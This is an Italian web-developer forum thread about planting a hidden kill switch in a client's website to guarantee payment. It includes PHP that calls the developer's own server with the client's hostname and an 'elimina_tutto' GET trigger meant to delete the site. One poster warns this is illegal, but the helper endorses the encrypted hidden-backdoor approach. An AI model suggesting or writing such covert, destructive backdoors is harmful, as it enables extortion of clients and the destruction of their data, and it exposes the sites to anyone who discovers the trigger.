Precauzioni prima della consegna di un sito

Allora, se aggiunto nel sito del cliente
PHP:
<?php
    $file = file_get_contents('http://miosito.it/pagina_remota.php?sito='.$_SERVER['HTTP_HOST']);
    if($file!=1){ 
        echo "Distruggi";
        echo "<br>";
        echo $_SERVER['HTTP_HOST'];
    }else echo "Non distruggere";
- Vedo "Dstruggi sitocliente.it", dove sitocliente.it è uguale a quello che ho inserito nell' array.
- Lanciando manualmente dal mio sito se c'è sitocliente.it nell' array vedo 1, se non c'è non vedo niente.
- Per quanto riguarda file_get_contents() non so dove mettere le mani.
- Nella pagina c'è solo quello che ho incollato quà...
$file che valore ha? Comunque mi sembra proprio che dipenda dal file_get_contents() non abilitato sul sito del cliente, a questo punto puoi optare per queste 2 soluzioni:
-Mettere un codice solo nel sito locale del cliente, criptato, e una volta pagato lo rimuovi
es. sitocliente.it/pagina_locale.php?elimina_tutto=si
PHP:
if($_GET['elimina_tutto']=='si'){ 
     //elimini quello che vuoi
}
-Provare utilizzando la libreria curl
es.
PHP:
$ch = curl_init('http://miosito.it/pagina_remota.php?sito='.$_SERVER['HTTP_HOST']);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$file = curl_exec($ch);
    if($file!=1){  
        echo "Distruggi"; 
        echo "<br>"; 
        echo $_SERVER['HTTP_HOST']; 
    }else echo "Non distruggere";
 
Niente da fare, neanche con la curl non va... Stessa identica cosa.
Non mi resta che optare per il file criptato!
Comunque ti ringrazio per la disponibilità e per gli ennesimi tentativi :) saluti,
Francesco.
 
Niente da fare, neanche con la curl non va... Stessa identica cosa.
Non mi resta che optare per il file criptato!
Comunque ti ringrazio per la disponibilità e per gli ennesimi tentativi :) saluti,
Francesco.
Ho usato spesso questi metodi e funzionavano sempre, comunque va bene anche il singolo file, solo che nell'altro modo li avevi tutti ed era più dinamico, di nulla
 
Giusto un punto. Inserire codice 'nascosto', non richiesto quindi dall'utente, sul suo spazio web è un reato e se il cliente se ne dovesse accorgere potrebbe anche denunciare lo sviluppatore.
Quindi se fai una cosa del genere prima vedi il livello di preparazione dell'utente e poi pensaci su perché se poi cambia web-developer e il nuovo scopre ciò che hai fatto e lo riferisce sei nei guai :)

Molto meglio la soluzione che ha suggerito borgo facendo vedere tutto sul tuo sito.
 
Giusto un punto. Inserire codice 'nascosto', non richiesto quindi dall'utente, sul suo spazio web è un reato e se il cliente se ne dovesse accorgere potrebbe anche denunciare lo sviluppatore.
Quindi se fai una cosa del genere prima vedi il livello di preparazione dell'utente e poi pensaci su perché se poi cambia web-developer e il nuovo scopre ciò che hai fatto e lo riferisce sei nei guai :)

Molto meglio la soluzione che ha suggerito borgo facendo vedere tutto sul tuo sito.
Su questo hai ragione, infatti come ho scritto precedentemente è lui che deve valutare il livello di quel cliente, e dopo la trattativa è preferibile rimuoverlo. Però con tutti i truffatori che girano averci una sicurezza in più (anche se un po bastarda) fa sempre comodo.
 
Sono il primo che vuole sicurezze ma prima di fare una cosa illegale ci penso un po' su e se ci sono altre soluzioni migliori allora sfrutto quelle. Poi tanto è tutto a discrezione del programmatore :)

EDIT: ovviamente prima di cancellare tutto copia da qualche parte.
 
Ultima modifica:

Discussioni simili